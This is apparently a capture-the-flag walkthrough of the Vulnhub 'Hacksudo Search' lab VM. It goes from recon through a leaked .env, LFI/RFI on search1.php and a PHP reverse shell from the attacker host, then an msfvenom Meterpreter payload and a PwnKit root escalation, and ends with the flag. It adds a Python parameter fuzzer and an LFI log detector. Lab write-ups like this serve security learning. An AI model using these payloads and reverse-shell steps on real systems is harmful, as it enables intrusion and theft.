Hacksudo Search

Identifying the target host IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24

 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:f5:05:04      1      60  PCS Systemtechnik GmbH
 192.168.56.162  08:00:27:b8:ce:1e      1      60  PCS Systemtechnik GmbH

Using netdiscover on Kali Linux (ARP sweep of the host-only network), the target host is identified as 192.168.56.162. 192.168.56.1 is the VirtualBox host adapter and 192.168.56.100 is the VirtualBox DHCP server, so the remaining PCS Systemtechnik (VirtualBox) MAC is the target VM.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 21:30 EDT
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)
|   256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)
|_  256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: HacksudoSearch
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B8:CE:1E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.71 seconds

The full-port Nmap scan shows only two open TCP ports: 22 (SSH, OpenSSH 7.9p1 on Debian 10) and 80 (HTTP, Apache 2.4.38). Everything else is closed (RST), so the web application is the only realistic entry point.

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/robots.txt
/* find me * im number 1 search engine . just joking :) www.hacksudo.com

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ nikto -h http://192.168.56.162
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.162
+ Target Hostname:    192.168.56.162
+ Target Port:        80
+ Start Time:         2023-04-24 22:26:53 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /account/: Directory indexing found.
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.env: .env file found. The .env file may contain credentials.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2023-04-24 22:27:52 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto reports directory indexing on /account/. The listing contains many files, but every one of them returns an empty response, so the directory is a dead end (the indexing itself is still a misconfiguration worth noting: Options -Indexes would hide the listing).

Nikto also finds /.env, the Laravel-style environment file, served directly by Apache:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/.env
APP_name=HackSudoSearch
APP_ENV=local
APP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!

The file leaks the database credentials (hiraman / MyD4dSuperH3r0!). The APP_key is not a real key: its base64 decodes to a hint text pointing at www.hacksudo.com/contact. MySQL is bound to 127.0.0.1 and port 3306 is not exposed, so the password cannot be tested against the database from outside, and hiraman is not a valid SSH login either:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ ssh hiraman@192.168.56.162
The authenticity of host '192.168.56.162 (192.168.56.162)' can't be established.
ED25519 key fingerprint is SHA256:dzS9ujCpu8ohIPbqCaxf4e6gi5YSgBrhAI8srwr1giU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.162' (ED25519) to the list of known hosts.
hiraman@192.168.56.162's password:
Permission denied, please try again.
hiraman@192.168.56.162's password:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.162
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,txt,bak,js,sh
[+] Timeout:                 10s
===============================================================
2023/04/24 22:31:27 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.162/images/]
/index.php            (Status: 200) [Size: 715]
/search.php           (Status: 200) [Size: 165]
/submit.php           (Status: 200) [Size: 165]
/assets               (Status: 301) [Size: 317] [--> http://192.168.56.162/assets/]
/account              (Status: 301) [Size: 318] [--> http://192.168.56.162/account/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.162/javascript/]
/robots.txt           (Status: 200) [Size: 75]
/LICENSE              (Status: 200) [Size: 1074]
/search1.php          (Status: 200) [Size: 2918]

Gobuster turns up /search1.php. Its Contact section carries a hint from the box author that a request parameter has to be fuzzed, so the parameter name is brute-forced with wfuzz. A directory traversal to /etc/passwd is used as the value so that a real file inclusion changes the response size, and --hw 288 hides every response that still has the 288 words of the unmodified page:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ wfuzz -c -u 'http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001129:   200        143 L    260 W      3797 Ch     "me"

The only response that passes the filter is for the parameter name me (143 lines, 3797 characters instead of the baseline page), so search1.php includes whatever file the me parameter names.
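The same search written in a few lines of Python, as an added example that is not part of the original write-up: it mirrors the wfuzz run above, but besides hiding responses whose word count equals the baseline (what --hw 288 does) it also looks for the root:x:0:0 line that proves /etc/passwd was actually included, so a definite inclusion is reported separately from a response that merely changed size (a PHP warning, for instance). The target URL, the small built-in wordlist and the fetch function are illustrative assumptions; pass a real wordlist for an engagement.

```python
"""Parameter-name fuzzing for a suspected file-inclusion endpoint.

Added example, not code from the original write-up: it mirrors the wfuzz run
above but filters on content as well as on the baseline word count, so a
definite inclusion (the root:x:0:0 line of /etc/passwd appears) is reported
separately from a response that merely differs in size. The target URL,
the small wordlist and the fetch function are illustrative assumptions.
"""
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable

# A fetcher maps a URL to the response body; tests inject an offline fake.
Fetcher = Callable[[str], str]

# A line starting with root:x:0:0: only shows up if /etc/passwd was included.
PASSWD_SIG = re.compile(r"^root:x:0:0:", re.MULTILINE)


def http_fetch(url: str, timeout: float = 5.0) -> str:
    """Plain GET; network errors are treated as an empty body."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.URLError:
        return ""


def build_url(base: str, param: str, value: str) -> str:
    """base?param=value, keeping the slashes of the traversal payload literal."""
    return f"{base}?{urllib.parse.quote(param)}={urllib.parse.quote(value, safe='/')}"


def classify(body: str, baseline_words: int) -> str:
    """'hit' = passwd content visible; 'different' = word count changed
    (what wfuzz --hw filters on); 'baseline' = same as the unfuzzed page."""
    if PASSWD_SIG.search(body):
        return "hit"
    if len(body.split()) != baseline_words:
        return "different"
    return "baseline"


def fuzz_params(base: str, names: Iterable[str],
                payload: str = "../../../../../../etc/passwd",
                fetch: Fetcher = http_fetch) -> Dict[str, str]:
    """Try every candidate name as the GET parameter carrying the payload.

    Returns {name: verdict} for names whose response is not the baseline.
    The baseline is measured with a parameter name the app will not know,
    so the page's normal word count is learned instead of hard-coded (288).
    """
    baseline = fetch(build_url(base, "zzz_no_such_param", payload))
    baseline_words = len(baseline.split())
    findings: Dict[str, str] = {}
    for name in names:
        verdict = classify(fetch(build_url(base, name, payload)), baseline_words)
        if verdict != "baseline":
            findings[name] = verdict
    return findings


if __name__ == "__main__":
    # Assumed target and a tiny wordlist; use a real list for an engagement.
    wordlist = ["q", "file", "page", "me", "view", "include"]
    for name, verdict in fuzz_params("http://192.168.56.162/search1.php", wordlist).items():
        print(f"{verdict:9s} {name}")
```

Measuring the baseline at run time rather than hard-coding 288 matters on real targets, where the page body changes with session state or time; a definite "hit" verdict is what you act on, while "different" entries are a queue for manual review.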

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/search1.php?me=../../../../../../etc/passwd
Home About Contact

HackSudo Search box

JumpStation The web crawler with Google

root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash

Visit --> www.hacksudo.com

/etc/passwd lists four accounts with a login shell: hacksudo, monali, john and search. With a working LFI, the next check is whether any of their SSH private keys can be read through the same parameter:

http://192.168.56.162/search1.php?me=../../../../../../home/search/.ssh/id_rsa

Testing the three regular users this way finds no readable SSH private key (the home directories are mode 750, so www-data cannot read them anyway, and the LFI runs as www-data).

Next, check whether the inclusion is remote as well as local (this only works if PHP's allow_url_include is enabled). The test is to point the parameter at a file served from the attacker's machine and see whether it is fetched:

http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/test.txt

The test file is included, so the target is vulnerable to remote file inclusion. On Kali, prepare shell.php (a PHP reverse shell that connects back to 192.168.56.230 on port 5555) and serve it with Python's http.server on port 8000.

Then request the following URL so the target fetches and executes the PHP:

http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/shell.php

The target's reverse shell arrives at the netcat listener on Kali, running as www-data; a pty is spawned with python to get a usable terminal:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.162] 55864
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
 22:00:50 up 40 min,  0 users,  load average: 0.01, 1.18, 1.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@HacksudoSearch:/$ cd /home
www-data@HacksudoSearch:/home$ ls -alh
total 24K
drwxr-xr-x  6 root     root     4.0K Apr 15  2021 .
drwxr-xr-x 18 root     root     4.0K Apr 11  2021 ..
drwxr-x---  6 hacksudo hacksudo 4.0K Apr 15  2021 hacksudo
drwxr-x---  2 john     john     4.0K Apr 13  2021 john
drwxr-x---  2 monali   monali   4.0K Apr 13  2021 monali
drwxr-x---  2 search   search   4.0K Apr 15  2021 search
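For the defensive side of the same flaw, here is an added example that is not part of the original write-up and not the box's own code: it scans Apache combined-format access log lines for the kinds of inclusion probes used above, namely traversal sequences, sensitive file names, a remote URL or PHP stream wrapper as the parameter value, and references to log files, which is what an SSH or Apache log-poisoning attempt through the LFI would look like. The log lines are constructed to mirror this walkthrough's requests.

```python
"""Detect LFI/RFI probes in Apache access logs.

Added example for the detection side of the search1.php flaw; it is not part
of the original write-up. The log lines below are constructed to mirror the
requests made in this walkthrough (Apache 'combined' format assumed).
"""
import re
import urllib.parse
from typing import List, Tuple

# ip ident user [timestamp] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Value patterns, checked after URL-decoding. Decoding a second time in
# classify_value catches attackers who encode the encoding (%252e%252e%252f).
TRAVERSAL = re.compile(r"\.\./|\.\.\\")
REMOTE_OR_WRAPPER = re.compile(r"^(?:[a-z][a-z0-9+.\-]*://|data:)", re.I)
SENSITIVE = re.compile(r"/etc/(?:passwd|shadow)|/proc/self|\.ssh/id_")
LOG_FILES = re.compile(r"/var/log/(?:auth\.log|apache2|access|nginx)")

# Constructed sample log: the probes from this walkthrough plus two benign hits.
SAMPLE_LOG = """\
192.168.56.230 - - [24/Apr/2023:22:31:27 -0400] "GET /search1.php HTTP/1.1" 200 2918 "-" "Mozilla/5.0"
192.168.56.230 - - [24/Apr/2023:22:35:01 -0400] "GET /search1.php?me=../../../../../../etc/passwd HTTP/1.1" 200 3797 "-" "curl/7.88.1"
192.168.56.230 - - [24/Apr/2023:22:36:10 -0400] "GET /search1.php?me=..%2F..%2F..%2Fhome%2Fsearch%2F.ssh%2Fid_rsa HTTP/1.1" 200 2918 "-" "curl/7.88.1"
192.168.56.230 - - [24/Apr/2023:22:40:44 -0400] "GET /search1.php?me=http://192.168.56.230:8000/shell.php HTTP/1.1" 200 2918 "-" "Mozilla/5.0"
192.168.56.230 - - [24/Apr/2023:22:41:00 -0400] "GET /search1.php?me=/var/log/auth.log HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
192.168.56.230 - - [24/Apr/2023:22:42:00 -0400] "GET /search.php?q=hacksudo HTTP/1.1" 200 165 "-" "Mozilla/5.0"
"""

Finding = Tuple[str, str, str, List[str]]  # (client ip, path, param, tags)


def classify_value(value: str) -> List[str]:
    """Tag one query-string value; an empty list means nothing suspicious."""
    v = urllib.parse.unquote(value)  # parse_qsl decoded once; undo a second layer
    tags: List[str] = []
    if TRAVERSAL.search(v):
        tags.append("traversal")
    if REMOTE_OR_WRAPPER.match(v):
        tags.append("rfi_or_wrapper")
    if SENSITIVE.search(v):
        tags.append("sensitive_file")
    if LOG_FILES.search(v):
        tags.append("log_poisoning")
    return tags


def scan(log_text: str) -> List[Finding]:
    """Return one finding per suspicious query parameter in the log."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-format; skip rather than guess
        url = urllib.parse.urlsplit(m["path"])
        for name, value in urllib.parse.parse_qsl(url.query, keep_blank_values=True):
            tags = classify_value(value)
            if tags:
                findings.append((m["ip"], url.path, name, tags))
    return findings


if __name__ == "__main__":
    for ip, path, param, tags in scan(SAMPLE_LOG):
        print(f"{ip} {path} param={param} {','.join(tags)}")
```

Only the query string is inspected here; a POST body or a cookie can carry the same payload, and a 200 with a size jump (the 3797-byte passwd response versus the usual 2918) is the confirmation that the probe succeeded rather than just being attempted.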

Privilege escalation

Generate a Meterpreter payload with msfvenom, upload it to /tmp on the target, make it executable and run it from the www-data shell; catch it with exploit/multi/handler and then run the local exploit suggester against the session:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.230:6666
[*] Sending stage (989032 bytes) to 192.168.56.162
[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.162:33994) at 2023-04-24 22:51:21 -0400

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.162 - Collecting local exploits for x86/linux...
[*] 192.168.56.162 - 167 exploit checks are being tried...
[+] 192.168.56.162 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.162 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.162 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.162 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 2   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/su_login                                       Yes                      The service appears to be vulnerable.

The suggester's first candidate, PwnKit (CVE-2021-4034, the polkit pkexec argument-handling bug), is selected. The 2021 Debian 10 image has an unpatched pkexec, so this goes straight from www-data to root and skips the author's intended route (password reuse over SSH, then a PATH hijack of the SUID searchinstall binary described in root's notes.txt below). Note that the module writes and then deletes a shared object under /tmp; the "Verify cleanup" warnings are worth checking on a real engagement.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.aqmsnondyug
[+] The target is vulnerable.
[*] Writing '/tmp/.esjvtiaf/vswplcef/vswplcef.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.esjvtiaf
[*] Sending stage (3020772 bytes) to 192.168.56.162
[+] Deleted /tmp/.esjvtiaf/vswplcef/vswplcef.so
[+] Deleted /tmp/.esjvtiaf/.qbbgfqf
[+] Deleted /tmp/.esjvtiaf
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.162:40940) at 2023-04-24 22:55:08 -0400

meterpreter > shell
Process 1145 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls
notes.txt
root.txt
cat notes.txt
(ASCII-art banner: hacksudo search)
+-------------------------------------------------------------------------+
hacksudo search Box created By vishal waghmare
https://instagram.com/realvilu
try hacksudo other box
1.hacksudo 1.1
2.hacksudo 2
3.hacksudo 3
4.hacksudo aliens
+----------------------------------+
this box name is hacksudo search.
it's my pleasure to create such box .
+-----------------------------------+
if any query or want any kinda support you can contact us
email: info@hacksudo.com
       visal@hacksudo.com
web  : www.hacksudo.com
+----------------------------+
hacksudo search vulnerability:
1. LFI ssh log poisioning / RFI on search1.php
2. after geting shell or you can do ls -la in /var/www/html
   in .env there is password hint
3. users are 3 to 4 so confused? do ssh one by one
   else do hydra with given password (MyD4dSuperH3r0!)
4. hacksudo ssh login done now do privileged escalation , there is searchinstall.c
   searchinstall file which one have SUID permision and by read searchinstall.c
   there you can read install command which is triggerd .
   so try path veriable
   and you will get root access
+++------rooted------------+++
yes you roted box thats why you read this
btw create your writeup how you solve this box and send to me
i love to read your way how you solve this box
+++---------+++-----------+++
Signed out
#vishal waghmare
cat root.txt
(ASCII-art banner: hacksudo Search)
You Successfully Hackudo search box rooted!!!
flag={9fb4c0afce26929041427c935c6e0879}

STRIVE FOR PROGRESS,NOT FOR PERFECTION